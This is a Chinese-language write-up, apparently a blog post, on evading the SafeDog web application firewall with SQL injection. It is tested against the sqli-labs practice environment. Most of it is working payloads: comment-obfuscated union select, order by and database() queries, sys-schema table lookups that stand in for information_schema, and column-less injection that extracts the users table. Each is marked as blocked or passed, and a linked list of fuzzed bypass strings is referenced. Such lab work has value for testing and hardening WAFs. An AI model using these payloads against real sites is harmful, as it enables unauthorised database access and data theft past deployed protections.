环境
安全狗版本:4.0.32517 下载地址:https://www.safedog.cn/website_safedog.html
靶场:https://github.com/Audi-1/sqli-labs
php版本:5.6.9
Apache:2.4.39
and
?id=1' and -- - 不拦截
?id=1' and 1 -- - 拦截
bypass
/Less-1/?id=1%27%20and/*§fuzz§*/1=1%20--%20-
在and/**/1=1
注释符fuzz
下面fuzz出来的字符都不拦截
设置条件导出payload,条件为返回包数据,保存文件为sqlifuzz.txt
sqlifuzz.txt
7000多个字符,文件已上传到github:https://github.com/wy876/bypass
使用fuzz出来的字符绕过waf
http://192.168.0.101/Less-1/?id=1' and/*/!/%%%*/1=1 -- -
http://192.168.0.101/Less-1/?id=1' and/*/!/%%%*/1=2 -- -
order by
?id=1' order by 3 -- - 拦截
?id=1' order/*/+/%%%*/by 3 -- - 不拦截
?id=1' order/*/+/%%%*/by 4 -- - 不拦截
union select
http://192.168.0.101/Less-1/?id=-1' union/*/!/%%%*/select 1,2,3 -- - 拦截
使用上面sqlifuzz.txt
fuzz出来的字符,接着用burp跑一编绕过
http://192.168.0.101/Less-1/?id=-1' union/*%2f%2f%2b-*/select 1,2,3 -- - 不拦截
database()
使用注释符 database/*%2f%2f%2b-*/()
绕过,databas带着()
组合就会拦截
http://192.168.0.101/Less-1/?id=-1' union/*%2f%2f%2b-*/select 1,database(),3 -- - 拦截
http://192.168.0.101/Less-1/?id=-1' union/*%2f%2f%2b-*/select 1,database/*%2f%2f%2b-*/(),3 -- - 不拦截
user()
http://192.168.0.101/Less-1/?id=-1' union/*%2f%2f%2b-*/select 1,user/*%2f%2f%2b-*/(),3 -- -
使用sys库进行替换 information_schema 查询表名
schema_table_statistics_with_buffer和x$schema_table_statistics_with_buffer
# 查询数据库
select table_schema from sys.schema_table_statistics_with_buffer;
select table_schema from sys.x$schema_table_statistics_with_buffer;
# 查询指定数据库的表
select table_name from sys.schema_table_statistics_with_buffer where table_schema=database();
select table_name from sys.x$schema_table_statistics_with_buffer where table_schema=database();
测试拦截字符
?id=-1' union/*//+-*/select 1,2,group_concat(table_name) from -- - 不拦截
?id=-1' union/*//+-*/select 1,2,group_concat(table_name) from 1 -- - from后面任何字符都拦截
?id=-1' union/*//+-*/select 1,2,group_concat(table_name) from /*%2f%2a*/1 -- - 不拦截
?id=-1' union/*//+-*/select 1,2,group_concat(table_name) from /*%2f%2a*/information_schema.tables -- - 拦截
?id=-1' union/*//+-*/select 1,2,table_name from/*%2f%2a*/sys.schema_table_statistics_with_buffer where table_schema=database/*%2f%2f%2b-*/() -- - 不拦截
无列名注入 查询数据
group_concat(`3`) 为字段的位数
select * from user where id='-1' union select 1,2,group_concat(`3`) from (select 1,2,3 union select * from users)x;
?id=-1%27%20union/*//+-*/select%201,2,group_concat(`3`) from (select 1,2,3 union select * from users)x -- - 拦截
?id=-1%27%20union/*//+-*/select%201,2,group_concat(`2`) from (select 1,2,3 union/*//+-*/select * from/*//+-*/users)x -- - 不拦截
参考文章:
https://johnfrod.top/%E5%AE%89%E5%85%A8/%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87information_schema/
https://blog.csdn.net/qq_36618918/article/details/129265271